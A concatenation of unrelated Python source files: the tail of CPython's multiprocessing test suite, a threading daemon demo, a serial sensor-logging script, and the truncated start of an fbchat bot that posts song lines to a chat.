self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
04-daemon.py
|
import time
import threading
def myfunc(name):
print(f"myfunc started with {name}")
time.sleep(10)
print("myfunc ended")
if __name__ == '__main__':
print('main started')
#myfunc('realpython')
t=threading.Thread(target=myfunc, args=['realpython'],daemon=True)
t.start()
print('main ended')
|
capture_sensor_data.py
|
#!/usr/bin/env python3
import serial
from threading import Thread
from time import sleep, time
import argparse, logging, subprocess
import arduino_mode
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', default='/dev/serial0', help="Device to use for serial connection")
parser.add_argument('-l', '--logfile', default=None, help="Log file to use")
parser.add_argument('-r', "--record_cmd", default=None, help="Command with arguments to record videos")
args = parser.parse_args()
try:
ser = serial.Serial(args.device, 115200)
sleep(1)
ser.flushInput()
except:
print("Failed to open serial port", args.device)
quit()
if args.logfile is not None:
logging.basicConfig(filename=args.logfile, filemode='w', level=logging.DEBUG,
format='%(relativeCreated)d %(message)s')
#logging.Formatter(fmt='%(asctime)s.%(msecs)03d %(message)s', datefmt='%H:%M:%S')
#0 - Pass throttle and steering values from remote to the car and Pi
#1 - Pass throttle and steering values from Pi to the car, ignore remote
#2 - Pass steering values only from remote to the car, good for manual pushing during training
#3 - Pass steering values only from Pi to the car, pass throttle from remote - good for testing
# Set to training mode
#ser.write('m=2'.encode())
#ser.flush()
arduino_mode.set_mode(0)
logging.info(b'{"mode":0, "throttle":0, "steering":0}\n')
bCont = True
def output_function():
global bCont
while bCont:
try:
read_serial=ser.readline()
if len(read_serial):
if args.logfile is not None:
logging.info(read_serial)
else:
print(read_serial)
#sleep(.02)
except serial.SerialException:
pass
except KeyboardInterrupt:
bCont = False
thread = Thread(target = output_function)
thread.start()
#Run script to capture videos
try:
subprocess.call(args.record_cmd.split())
except KeyboardInterrupt:
pass
bCont = False
# Wait for the other thread to finish
thread.join()
logging.shutdown()
ser.close()
|
papiezowa.py
|
import getpass
import logging
import os
import sys
import time
from random import randrange, uniform
from datetime import datetime as dt
from multiprocessing import Process
import fbchat
from dotenv import load_dotenv
import cookies
FORMAT = "%(asctime)s %(levelname)s: %(message)s"
logging.basicConfig(
format=FORMAT,
filename="/var/log/papiezowa/papiezowa.log",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def main_papa(thread, fake=False):
process = Process(target=bring_papaj, args=(thread, fake,))
return process
def count_down_the_papaj(thread, fake=False, counter=3):
if counter == 0:
return
if not fake:
try:
thread.send_text(f"{counter}...")
except fbchat.HTTPError:
time.sleep(uniform(0.5, 2.5))
return count_down_the_papaj(thread, fake, counter)
else:
print(f"{counter}...")
time.sleep(1)
return count_down_the_papaj(thread, fake, counter-1)
def bring_papaj(thread, fake=False):
count_down_the_papaj(thread, fake)
with open("barka.txt", "r") as f:
for line in f:
if not fake:
try:
thread.send_text(line.strip("\n"))
except fbchat.HTTPError:
time.sleep(uniform(8.0, 11.0))
thread.send_text(line.strip("\n"))
else:
print("{}, {}".format(thread, line.strip("\n")))
time.sleep(uniform(2.0, 6.0))
def create_fb_threads(sess, sess_types, threads, thread_types):
chats = []
